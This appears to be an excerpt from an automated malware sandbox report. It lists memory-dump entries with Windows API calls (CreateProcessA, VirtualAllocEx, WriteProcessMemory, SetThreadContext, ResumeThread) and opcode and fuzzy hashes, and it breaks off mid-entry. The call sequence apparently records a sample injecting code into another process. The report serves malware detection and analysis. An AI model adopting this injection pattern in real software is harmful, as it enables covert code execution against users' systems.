                                                                            • Source File: 00000000.00000002.318797804.0000000006FF0000.00000040.00000001.sdmp, Offset: 06FF0000, based on PE: false
                                                                            Similarity
                                                                            • API ID: CreateProcess
                                                                            • String ID:
                                                                            • API String ID: 963392458-0
                                                                            • Opcode ID: e3907e05c2f5499bb9a1ef90d7d973055533cea7f74863e8b2399c501040814b
                                                                            • Instruction ID: a08fbbf26e6e0fd1c2947a6a14bcf37397cdd96e8c34a8a759ae8eb45e143b60
                                                                            • Opcode Fuzzy Hash: e3907e05c2f5499bb9a1ef90d7d973055533cea7f74863e8b2399c501040814b
                                                                            • Instruction Fuzzy Hash: D3A17971D10219CFDB60DFA8D840BEEFBB2BF48314F1485A9E918A7290DB749985CF91
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06FF7646
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.318797804.0000000006FF0000.00000040.00000001.sdmp, Offset: 06FF0000, based on PE: false
                                                                            Similarity
                                                                            • API ID: CreateProcess
                                                                            • String ID:
                                                                            • API String ID: 963392458-0
                                                                            • Opcode ID: c97c5b1bf21fa32d0fdc1c17125d5a99ffa4e6d463c79578220a03fe9cafdda8
                                                                            • Instruction ID: d50001071391723dcbf702767f8930bf5089329861ccced5af19c73fa4544df9
                                                                            • Opcode Fuzzy Hash: c97c5b1bf21fa32d0fdc1c17125d5a99ffa4e6d463c79578220a03fe9cafdda8
                                                                            • Instruction Fuzzy Hash: A3917A71D10219CFDB50DFA8D880BEEFBB2BF48314F1485A9E918A7290DB749985CF91
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 00E59636
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.305239269.0000000000E50000.00000040.00000001.sdmp, Offset: 00E50000, based on PE: false
                                                                            Similarity
                                                                            • API ID: HandleModule
                                                                            • String ID:
                                                                            • API String ID: 4139908857-0
                                                                            • Opcode ID: 8be45705035b9d9d5e3f9eda7d718c83876964b6f5047f29a3221548cdd4a817
                                                                            • Instruction ID: fe0627aaae080489024cd0e105dc0b23d149971cbe38bd44feeca41fd9c307cc
                                                                            • Opcode Fuzzy Hash: 8be45705035b9d9d5e3f9eda7d718c83876964b6f5047f29a3221548cdd4a817
                                                                            • Instruction Fuzzy Hash: 217139B0A00B058FD764DF2AD1417AAB7F1FF88315F00492DD89AE7A41DB74E85ACB91
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • K32GetModuleBaseNameA.KERNEL32(?,?,?,?), ref: 06FF8199
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.318797804.0000000006FF0000.00000040.00000001.sdmp, Offset: 06FF0000, based on PE: false
                                                                            Similarity
                                                                            • API ID: BaseModuleName
                                                                            • String ID:
                                                                            • API String ID: 595626670-0
                                                                            • Opcode ID: 27fd7681ec602aeeffa17abf225019511460f9fce720fc150d46126074b76cf8
                                                                            • Instruction ID: 27592fc935b538b0f496d204eedddf9028f900465f82386f3857b5c4e40a993e
                                                                            • Opcode Fuzzy Hash: 27fd7681ec602aeeffa17abf225019511460f9fce720fc150d46126074b76cf8
                                                                            • Instruction Fuzzy Hash: B15186B0D10208DFCB14CFA9C854BDEBBB1BF09354F148269E929AB360D774A845CF91
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 00E5FE6A
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.305239269.0000000000E50000.00000040.00000001.sdmp, Offset: 00E50000, based on PE: false
                                                                            Similarity
                                                                            • API ID: CreateWindow
                                                                            • String ID:
                                                                            • API String ID: 716092398-0
                                                                            • Opcode ID: d884ad5cfa0f0d6bc324dbefd8bf98a4aef2424dc4c7a084c62a6865aaf8ffa6
                                                                            • Instruction ID: 0316909c33406a75c3365668a394bfbabb441570166c08938b6a477782f47878
                                                                            • Opcode Fuzzy Hash: d884ad5cfa0f0d6bc324dbefd8bf98a4aef2424dc4c7a084c62a6865aaf8ffa6
                                                                            • Instruction Fuzzy Hash: 4D41B0B1D00309DFDB14CF9AC884ADEFBB5BF48314F24852AE819AB210D774A945CF91
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • K32GetModuleBaseNameA.KERNEL32(?,?,?,?), ref: 06FF8199
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.318797804.0000000006FF0000.00000040.00000001.sdmp, Offset: 06FF0000, based on PE: false
                                                                            Similarity
                                                                            • API ID: BaseModuleName
                                                                            • String ID:
                                                                            • API String ID: 595626670-0
                                                                            • Opcode ID: 7800805f71bca39d0e06a52ebf60300e9419f067c641e4b8b5de86086157f408
                                                                            • Instruction ID: ec2b13e2347705543e98dc005cf572bb4f58b09f13fb6ef739d8228721105149
                                                                            • Opcode Fuzzy Hash: 7800805f71bca39d0e06a52ebf60300e9419f067c641e4b8b5de86086157f408
                                                                            • Instruction Fuzzy Hash: 35412670D106488FDB14CFA9C898BDEBBF1BF48354F148629E929AB360D7749845CF91
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 00E5FE6A
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.305239269.0000000000E50000.00000040.00000001.sdmp, Offset: 00E50000, based on PE: false
                                                                            Similarity
                                                                            • API ID: CreateWindow
                                                                            • String ID:
                                                                            • API String ID: 716092398-0
                                                                            • Opcode ID: 2616f5202fde7b34f7f956e5aecaff174539f56e4f375a56c00a0d044c389b12
                                                                            • Instruction ID: 000af29653e29c7bb06b8219e51a251fe992ad6e60cbb13bb57ed2cdbb9691c6
                                                                            • Opcode Fuzzy Hash: 2616f5202fde7b34f7f956e5aecaff174539f56e4f375a56c00a0d044c389b12
                                                                            • Instruction Fuzzy Hash: 8551C0B5D00349DFDB14CF99C984ADEBBB1BF48314F24852AE819AB211DB749945CF90
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • CreateActCtxA.KERNEL32(?), ref: 00E55401
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.305239269.0000000000E50000.00000040.00000001.sdmp, Offset: 00E50000, based on PE: false
                                                                            Similarity
                                                                            • API ID: Create
                                                                            • String ID:
                                                                            • API String ID: 2289755597-0
                                                                            • Opcode ID: 6d7373b9166bd54e197831c3d859f5a486ec1da360a6b3ea592eae5f7195081b
                                                                            • Instruction ID: da2a84408c5f0de2ba3adf719e4f8b0ca35eb3710edf909ee248086f722ffe3f
                                                                            • Opcode Fuzzy Hash: 6d7373b9166bd54e197831c3d859f5a486ec1da360a6b3ea592eae5f7195081b
                                                                            • Instruction Fuzzy Hash: 71411271C00618CEDB20CFA9C884BDEFBB5BF88309F248469D419BB251DB75694ACF90
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • CreateActCtxA.KERNEL32(?), ref: 00E55401
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.305239269.0000000000E50000.00000040.00000001.sdmp, Offset: 00E50000, based on PE: false
                                                                            Similarity
                                                                            • API ID: Create
                                                                            • String ID:
                                                                            • API String ID: 2289755597-0
                                                                            • Opcode ID: ca5683df5ee5ab984edb160fc2c1a0a43af3b4b281016177368ebdec7061ed4c
                                                                            • Instruction ID: 19b0d58d353be4c82f23f6e85344d2843cb07892f3f58c0ceeea1c75d663a609
                                                                            • Opcode Fuzzy Hash: ca5683df5ee5ab984edb160fc2c1a0a43af3b4b281016177368ebdec7061ed4c
                                                                            • Instruction Fuzzy Hash: DC41E071C00618CFDB24CFA9C8447DEBBB5BF48309F248469D419BB251DBB5694ACF91
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.318797804.0000000006FF0000.00000040.00000001.sdmp, Offset: 06FF0000, based on PE: false
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 8fcfbfeee6b427cd98cbefea301f0e0d7fcd31f8a4528d607719a36f3cc1c97b
                                                                            • Instruction ID: 0b2509af1da73ddfdc2e1604528b9383db8238c7c5bb0df4b635f123ab9a9bcd
                                                                            • Opcode Fuzzy Hash: 8fcfbfeee6b427cd98cbefea301f0e0d7fcd31f8a4528d607719a36f3cc1c97b
                                                                            • Instruction Fuzzy Hash: 8621F171D013089FCB10EFA9D844ADFFFF9AF45310F04841AE518A7211DB39A904DB91
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06FF7298
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.318797804.0000000006FF0000.00000040.00000001.sdmp, Offset: 06FF0000, based on PE: false
                                                                            Similarity
                                                                            • API ID: MemoryProcessWrite
                                                                            • String ID:
                                                                            • API String ID: 3559483778-0
                                                                            • Opcode ID: 3ac28e331a8ca126a7f2f3ce8dc2ccfcb5998fe0b486de5eaef0c594616d6243
                                                                            • Instruction ID: af6db62c37d6b27e1a4e39ccbd88b14e27ec770d160f4607cc37d45263214954
                                                                            • Opcode Fuzzy Hash: 3ac28e331a8ca126a7f2f3ce8dc2ccfcb5998fe0b486de5eaef0c594616d6243
                                                                            • Instruction Fuzzy Hash: 28212471D002099FCB50DFA9C884BEEBBF5FF88314F14842AE918A7250D7789955CFA1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06FF7298
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.318797804.0000000006FF0000.00000040.00000001.sdmp, Offset: 06FF0000, based on PE: false
                                                                            Similarity
                                                                            • API ID: MemoryProcessWrite
                                                                            • String ID:
                                                                            • API String ID: 3559483778-0
                                                                            • Opcode ID: 9a77045fc3b346cef00061b09a496d6e73c0eb943aa60f853809600421b536c3
                                                                            • Instruction ID: a0b1a4f4540282b3631bf91339214e03bf39a4b0e187382377a0497799c52b22
                                                                            • Opcode Fuzzy Hash: 9a77045fc3b346cef00061b09a496d6e73c0eb943aa60f853809600421b536c3
                                                                            • Instruction Fuzzy Hash: 412102719003099FCB50DFAAC884BDEBBF5FF48214F14882AE918A7250D778A955DBA1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • SetThreadContext.KERNELBASE(?,00000000), ref: 06FF702E
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.318797804.0000000006FF0000.00000040.00000001.sdmp, Offset: 06FF0000, based on PE: false
                                                                            Similarity
                                                                            • API ID: ContextThread
                                                                            • String ID:
                                                                            • API String ID: 1591575202-0
                                                                            • Opcode ID: 4e3a0bf8c1dae208587f0435e37e204281681f8a8b0ae971fa1dc82b6aa49740
                                                                            • Instruction ID: ef1eae14ab5108ef1a37414b048246a61bcb52b83e33d1d617fc037da1eb7ef2
                                                                            • Opcode Fuzzy Hash: 4e3a0bf8c1dae208587f0435e37e204281681f8a8b0ae971fa1dc82b6aa49740
                                                                            • Instruction Fuzzy Hash: 48213771D002098FCB50DFAAC4847EFFBF5AF48224F54842AE559A7640DB78A985CFA1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • K32EnumProcesses.KERNEL32(00000000,?,?), ref: 06FF7B03
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.318797804.0000000006FF0000.00000040.00000001.sdmp, Offset: 06FF0000, based on PE: false
                                                                            Similarity
                                                                            • API ID: EnumProcesses
                                                                            • String ID:
                                                                            • API String ID: 84517404-0
                                                                            • Opcode ID: 96abbcfee895a73a999252936fb8f7830a0a0d725a36fc632d4c93046838318e
                                                                            • Instruction ID: bef6900e0526a7fd44ce280b24d6318fe68f2fb0ea3ea62d82c0bcc35c82ac40
                                                                            • Opcode Fuzzy Hash: 96abbcfee895a73a999252936fb8f7830a0a0d725a36fc632d4c93046838318e
                                                                            • Instruction Fuzzy Hash: 5A2125B1D11619AFCB00CF9AD884BDEFBF4FF48224F00812AE518A3350D778A954CBA1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00E5B997
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.305239269.0000000000E50000.00000040.00000001.sdmp, Offset: 00E50000, based on PE: false
                                                                            Similarity
                                                                            • API ID: DuplicateHandle
                                                                            • String ID:
                                                                            • API String ID: 3793708945-0
                                                                            • Opcode ID: b623371746abeffc01fdeb453c14219e5094af003f5b31644171180628c25330
                                                                            • Instruction ID: 6bbacb2f35d39d225ca715b2e3aef8d370411fe380dc1f0fc812a9064e9c8a33
                                                                            • Opcode Fuzzy Hash: b623371746abeffc01fdeb453c14219e5094af003f5b31644171180628c25330
                                                                            • Instruction Fuzzy Hash: AB21E0B5901249DFDB10CFAAD584ADEBBF4FB48324F14841AE954A7310D378A954CFA1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • SetThreadContext.KERNELBASE(?,00000000), ref: 06FF702E
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.318797804.0000000006FF0000.00000040.00000001.sdmp, Offset: 06FF0000, based on PE: false
                                                                            Similarity
                                                                            • API ID: ContextThread
                                                                            • String ID:
                                                                            • API String ID: 1591575202-0
                                                                            • Opcode ID: 2366317f93f0d9e0f37f67d11da6c085fe83025ee54b12af1c668c6399474091
                                                                            • Instruction ID: ac83b0fa320189747b667c54b60c4774a1130eed4d5e31195dc9ca8cfced0922
                                                                            • Opcode Fuzzy Hash: 2366317f93f0d9e0f37f67d11da6c085fe83025ee54b12af1c668c6399474091
                                                                            • Instruction Fuzzy Hash: C2213571D003098FCB50DFAAC4847EEFBF5AF88224F14842AD919A7340DB78A945CFA1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00E5B997
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.305239269.0000000000E50000.00000040.00000001.sdmp, Offset: 00E50000, based on PE: false
                                                                            Similarity
                                                                            • API ID: DuplicateHandle
                                                                            • String ID:
                                                                            • API String ID: 3793708945-0
                                                                            • Opcode ID: 52cd4b8034a1807dbb6b92a410e840ce94e9dab571af300bf3959865c37c45c4
                                                                            • Instruction ID: 5910aeb1718cb459b3f40da34a56a0b0e0dd07c9a0f0d1d98ba532cbb929e41b
                                                                            • Opcode Fuzzy Hash: 52cd4b8034a1807dbb6b92a410e840ce94e9dab571af300bf3959865c37c45c4
                                                                            • Instruction Fuzzy Hash: 1E21C2B59012099FDB10CFAAD984ADEFBF8EB48324F14841AE954A7310D378A955CFA1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • EnumChildWindows.USER32(?,00000000,?), ref: 06FF8630
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.318797804.0000000006FF0000.00000040.00000001.sdmp, Offset: 06FF0000, based on PE: false
                                                                            Similarity
                                                                            • API ID: ChildEnumWindows
                                                                            • String ID:
                                                                            • API String ID: 3555792229-0
                                                                            • Opcode ID: 8393e0ccd5f35371796797e23d01508482a18b3681012c5fd3cda32653ea3214
                                                                            • Instruction ID: a74308ec72d6323e6d01c9bb01a138f7334cacad70468785a86921f3e63766f0
                                                                            • Opcode Fuzzy Hash: 8393e0ccd5f35371796797e23d01508482a18b3681012c5fd3cda32653ea3214
                                                                            • Instruction Fuzzy Hash: AD213771D102098FDB14CFAAC844BEEFBF5AF88324F14842AE454A3750DB78A945CFA1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • K32EnumProcesses.KERNEL32(00000000,?,?), ref: 06FF7B03
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.318797804.0000000006FF0000.00000040.00000001.sdmp, Offset: 06FF0000, based on PE: false
                                                                            Similarity
                                                                            • API ID: EnumProcesses
                                                                            • String ID:
                                                                            • API String ID: 84517404-0
                                                                            • Opcode ID: 724867b46bfef137c908a746e71d06747dfb019b7b76cef4e1284c8117c4e8fe
                                                                            • Instruction ID: 1cb34d29da7b05bf9abae61c0b94096705937b4924082b0149b8be776c49c0d7
                                                                            • Opcode Fuzzy Hash: 724867b46bfef137c908a746e71d06747dfb019b7b76cef4e1284c8117c4e8fe
                                                                            • Instruction Fuzzy Hash: C921F3B1D116199FCB00CF9AD884BDEFBF4FF48224F00812AE918A7340D778A954CBA5
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • EnumChildWindows.USER32(?,00000000,?), ref: 06FF8630
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.318797804.0000000006FF0000.00000040.00000001.sdmp, Offset: 06FF0000, based on PE: false
                                                                            Similarity
                                                                            • API ID: ChildEnumWindows
                                                                            • String ID:
                                                                            • API String ID: 3555792229-0
                                                                            • Opcode ID: 0f06539329de26e23a9303a00d8682a3a1319c28f9bfcf862c80c77dc0d73a19
                                                                            • Instruction ID: ac0880827427d1d3a1b2f14b2cb60c8183c1b6b3a858f05d36d913587a20f74b
                                                                            • Opcode Fuzzy Hash: 0f06539329de26e23a9303a00d8682a3a1319c28f9bfcf862c80c77dc0d73a19
                                                                            • Instruction Fuzzy Hash: 45212971D102098FDB50CF9AC844BEEFBF5AF88354F14842AE514A3350DB78A945CFA5
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • K32EnumProcessModules.KERNEL32(?,?,?,?), ref: 06FF7FD3
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.318797804.0000000006FF0000.00000040.00000001.sdmp, Offset: 06FF0000, based on PE: false
                                                                            Similarity
                                                                            • API ID: EnumModulesProcess
                                                                            • String ID:
                                                                            • API String ID: 1082081703-0
                                                                            • Opcode ID: 3d622a315e7f1f542f24d8dc06afaf88e718dffc98c0719d3a08766df0cbbbea
                                                                            • Instruction ID: 3ae980cb0e4d0e81f533f6031df3bcdf9c32bb1fe92cef99849d3954fcbb38c3
                                                                            • Opcode Fuzzy Hash: 3d622a315e7f1f542f24d8dc06afaf88e718dffc98c0719d3a08766df0cbbbea
                                                                            • Instruction Fuzzy Hash: FF212475D002099FCB10DF9AD484BDEFBF4EF88320F148429E958A7240D778AA45CFA1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06FF7186
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.318797804.0000000006FF0000.00000040.00000001.sdmp, Offset: 06FF0000, based on PE: false
                                                                            Similarity
                                                                            • API ID: AllocVirtual
                                                                            • String ID:
                                                                            • API String ID: 4275171209-0
                                                                            • Opcode ID: 53d3eaa357fbe37e5e26e546d38438bf13fbeda35d0ab512a49f108b3cf94076
                                                                            • Instruction ID: 4a447bcce645e40ccb22ecbd4e5fb76ba9c9c77dab01345206542996361df485
                                                                            • Opcode Fuzzy Hash: 53d3eaa357fbe37e5e26e546d38438bf13fbeda35d0ab512a49f108b3cf94076
                                                                            • Instruction Fuzzy Hash: 8C1189719003089FCB10DFAAD844BDFFBF9AF88324F148819E529A7210CB35A955CFA1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • K32EnumProcessModules.KERNEL32(?,?,?,?), ref: 06FF7FD3
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.318797804.0000000006FF0000.00000040.00000001.sdmp, Offset: 06FF0000, based on PE: false
                                                                            Similarity
                                                                            • API ID: EnumModulesProcess
                                                                            • String ID:
                                                                            • API String ID: 1082081703-0
                                                                            • Opcode ID: 616ca386da737e2cb822715a2a51f7ca0b8487c3dc62989cf00d6bc3aa0a932c
                                                                            • Instruction ID: d6a793b90203b8f5157e0839758bf4167601fa365663858599d15d7dca3cb737
                                                                            • Opcode Fuzzy Hash: 616ca386da737e2cb822715a2a51f7ca0b8487c3dc62989cf00d6bc3aa0a932c
                                                                            • Instruction Fuzzy Hash: BA2103B5D042099FCB50DF9AC484BDEFBF4EF88320F148429E968A7250D778A945CFA1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • VirtualProtect.KERNELBASE(?,?,?,?), ref: 07B27F0C
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.321343264.0000000007B20000.00000040.00000001.sdmp, Offset: 07B20000, based on PE: false
                                                                            Similarity
                                                                            • API ID: ProtectVirtual
                                                                            • String ID:
                                                                            • API String ID: 544645111-0
                                                                            • Opcode ID: 373686b12c6bbbdd7564f8a21eab483dc46ff5ca57b7e62b2add00f819e0374b
                                                                            • Instruction ID: 0fb6b10e886470aab0f21c6c97ce9cac5f5a13c759782f08d8875ba6a060164a
                                                                            • Opcode Fuzzy Hash: 373686b12c6bbbdd7564f8a21eab483dc46ff5ca57b7e62b2add00f819e0374b
                                                                            • Instruction Fuzzy Hash: 991108B1D042499FDB10DFAAC4446DFFBF5EF48324F148429D529A7200DB74A945CFA1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00E596B1,00000800,00000000,00000000), ref: 00E598C2
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.305239269.0000000000E50000.00000040.00000001.sdmp, Offset: 00E50000, based on PE: false
                                                                            Similarity
                                                                            • API ID: LibraryLoad
                                                                            • String ID:
                                                                            • API String ID: 1029625771-0
                                                                            • Opcode ID: 5a9834f7c9e078b58e4d88b2cd2cb1fec531cf8ea0418e71cd0d469b385ad7d8
                                                                            • Instruction ID: b63628b9bd7d682c809dfd50c5c753ac64f6401a8f90d6495d51b672c6d1d12a
                                                                            • Opcode Fuzzy Hash: 5a9834f7c9e078b58e4d88b2cd2cb1fec531cf8ea0418e71cd0d469b385ad7d8
                                                                            • Instruction Fuzzy Hash: CF11F2B6D00349DBCB14CF9AC448ADEFBF4EB89325F14842AD915A7600C778A949CFA1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00E596B1,00000800,00000000,00000000), ref: 00E598C2
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.305239269.0000000000E50000.00000040.00000001.sdmp, Offset: 00E50000, based on PE: false
                                                                            Similarity
                                                                            • API ID: LibraryLoad
                                                                            • String ID:
                                                                            • API String ID: 1029625771-0
                                                                            • Opcode ID: 3f5891c768acc027ce54fd703c4905567f9fc2445d458ce85877fef6d5fa64f4
                                                                            • Instruction ID: 124276a0266d206be21ed27ff163b57dbc306c8c603e431bcc56e404f5096d89
                                                                            • Opcode Fuzzy Hash: 3f5891c768acc027ce54fd703c4905567f9fc2445d458ce85877fef6d5fa64f4
                                                                            • Instruction Fuzzy Hash: 471114B6D002498FCB14CFAAC444AEEFBF4AB89324F14842AD855B7201C775A949CFA1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06FF7186
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.318797804.0000000006FF0000.00000040.00000001.sdmp, Offset: 06FF0000, based on PE: false
                                                                            Similarity
                                                                            • API ID: AllocVirtual
                                                                            • String ID:
                                                                            • API String ID: 4275171209-0
                                                                            • Opcode ID: 885574cdfafc8551b9664c297670e830bb1a77e86d4f1c83fb921b7dd1f40316
                                                                            • Instruction ID: dd4fd58b2b026acc709c4be82502e85880f257b31cf93c02843e39d088379641
                                                                            • Opcode Fuzzy Hash: 885574cdfafc8551b9664c297670e830bb1a77e86d4f1c83fb921b7dd1f40316
                                                                            • Instruction Fuzzy Hash: 39113471D002099FCB10DFAAC844BDFFBF5AF88324F148819E929A7250CB75A955CFA1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.321343264.0000000007B20000.00000040.00000001.sdmp, Offset: 07B20000, based on PE: false
                                                                            Similarity
                                                                            • API ID: ResumeThread
                                                                            • String ID:
                                                                            • API String ID: 947044025-0
                                                                            • Opcode ID: 65e828f27263f16b04c14d33723026b52f384a2ecacf2ccd91aa02bb12c15fac
                                                                            • Instruction ID: 9238489245f44baac745f78825bed7bf1030488f0f0b1a1fdd779de3637518a8
                                                                            • Opcode Fuzzy Hash: 65e828f27263f16b04c14d33723026b52f384a2ecacf2ccd91aa02bb12c15fac
                                                                            • Instruction Fuzzy Hash: 681128B19002098BDB10DFAAC4447DFFBF5AB88224F148819D529A7240DB75A945CB91
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 00E59636
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.305239269.0000000000E50000.00000040.00000001.sdmp, Offset: 00E50000, based on PE: false
                                                                            Similarity
                                                                            • API ID: HandleModule
                                                                            • String ID:
                                                                            • API String ID: 4139908857-0
                                                                            • Opcode ID: 35308d8b84eef9b0a8782234737fe0f834c750e14cd20fb04e0533751cd53573
                                                                            • Instruction ID: 3fb75df0e9a977d8026c5a18790b1d8550354d9a8b44991089ce9f144383d077
                                                                            • Opcode Fuzzy Hash: 35308d8b84eef9b0a8782234737fe0f834c750e14cd20fb04e0533751cd53573
                                                                            • Instruction Fuzzy Hash: AC11DFB5D016498FCB10CF9AC444ADEFBF4AB88324F14841AD829B7601D3B8A54ACFA1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.305100354.0000000000CED000.00000040.00000001.sdmp, Offset: 00CED000, based on PE: false
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: c92caeadf5b0a439def3b13c47e1cdcc87da5c5390be942a150280ccd81ab2b4
                                                                            • Instruction ID: 8a814a686a7b1e66cad3c948cb4ce27a19c762146c9b6aa989503ea8be741b76
                                                                            • Opcode Fuzzy Hash: c92caeadf5b0a439def3b13c47e1cdcc87da5c5390be942a150280ccd81ab2b4
                                                                            • Instruction Fuzzy Hash: 122134B2504280DFCB05DF15D9C0B2BBF65FB98328F24C569E8060B246C33AD956DBA2
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.305143611.0000000000E0D000.00000040.00000001.sdmp, Offset: 00E0D000, based on PE: false
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 7362786cfeb01e4b2af59b21dad90a030069629df9861c7e4bcf28b5a50e956d
                                                                            • Instruction ID: 77e121629d5c0cdf5fac82ed59e38903df22651b29f3082dc3b6fef1ef3e102d
                                                                            • Opcode Fuzzy Hash: 7362786cfeb01e4b2af59b21dad90a030069629df9861c7e4bcf28b5a50e956d
                                                                            • Instruction Fuzzy Hash: D8212571508200DFCB14CF54DCC4B16BB66FB84328F20C969D80D5B286C33AD887CB62
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.305143611.0000000000E0D000.00000040.00000001.sdmp, Offset: 00E0D000, based on PE: false
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: a57db8b096ec8345850863829f1609bea471d5b3064fe59a7ef33289a51a5899
                                                                            • Instruction ID: 5d78b6f0938d0dd3a0f65ffd00996fff2f9b90c44c472250c8b62c058ba85325
                                                                            • Opcode Fuzzy Hash: a57db8b096ec8345850863829f1609bea471d5b3064fe59a7ef33289a51a5899
                                                                            • Instruction Fuzzy Hash: AC2108B1508340DFD710DF54D9C4B6ABBA5FB94728F24C569D4096B285C33DD886C763
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.305143611.0000000000E0D000.00000040.00000001.sdmp, Offset: 00E0D000, based on PE: false
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 456009cc70496f4495a8881dadb0141211851137ae4796dd9d119fda4332cc7f
                                                                            • Instruction ID: 49015d597f7934fad581f7d71ccabc20b6a19c2f9b0a2529a4532199a3b95af6
                                                                            • Opcode Fuzzy Hash: 456009cc70496f4495a8881dadb0141211851137ae4796dd9d119fda4332cc7f
                                                                            • Instruction Fuzzy Hash: CB21507550D3C08FCB12CF64D994715BF71EB46314F28C5EAD8498B697C33A984ACB62
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.305100354.0000000000CED000.00000040.00000001.sdmp, Offset: 00CED000, based on PE: false
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: f9154f6813b35f5e849061fcfaf88a5200d9197f54dc6ddbdd48086d4df7a377
